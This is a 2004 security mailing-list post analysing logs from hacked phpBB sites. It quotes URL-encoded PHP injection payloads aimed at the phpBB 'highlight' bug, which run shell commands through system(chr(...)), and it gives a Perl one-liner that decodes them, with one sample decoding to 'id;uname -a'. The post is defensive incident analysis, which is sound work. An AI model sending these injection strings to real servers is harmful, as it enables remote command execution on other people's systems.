[unisog] php sites hacked...

Andreas Östling andreaso at it.su.se
Mon Dec 20 20:31:39 GMT 2004


On Mon, 20 Dec 2004, Vijay S Sarvepalli VSSARVEP wrote:

> HA!  looks like the phpBB hack allowed access to all WWW user associaed 
> files.  Wherever the user permissions
> existed the files were overwritten such as *.html and *.php 
> 
> Vijay
>
> voyager.site5.com - - [20/Dec/2004:09:18:54 -0500] "GET 
> /viewtopic.php?t=2909&si
> d=404e630de56cce36069d7bf5fb44e2a0&highlight=%2527%252Esystem(chr(112)%252echr(1
> 01)%252echr(114)%252echr(108)%252echr(32)%252echr(45)%252echr(101)%252echr(32)%2
...

Those particular log examples show exploits for the highlight bug in
phpBB < 2.0.11 that was published a few weeks ago 
(http://secunia.com/advisories/13239/), not the recent bugs in PHP.

Here is an semi-working ugly Perl hack to decode the output from those 
exploits (remove wraps). E.g.:

echo 'viewtopic.php?t=123&highlight=%2527%252esystem(chr(105)
%252echr(100)%252echr(59)%252echr(117)%252echr(110)%252echr(97)%252
echr(109)%252echr(101)%252echr(32)%252echr(45)%252echr(97))%252e%2527 
HTTP/1.1' | perl -e 'while (<>) { chomp ($t .= $_) }; print "\nString:\n"; 
while ($t =~ /chr\((\d+)\)/) {  print chr $1; $t =~ s/chr\($1\)//; }'

String:
id;uname -a


/Andreas



More information about the unisog mailing list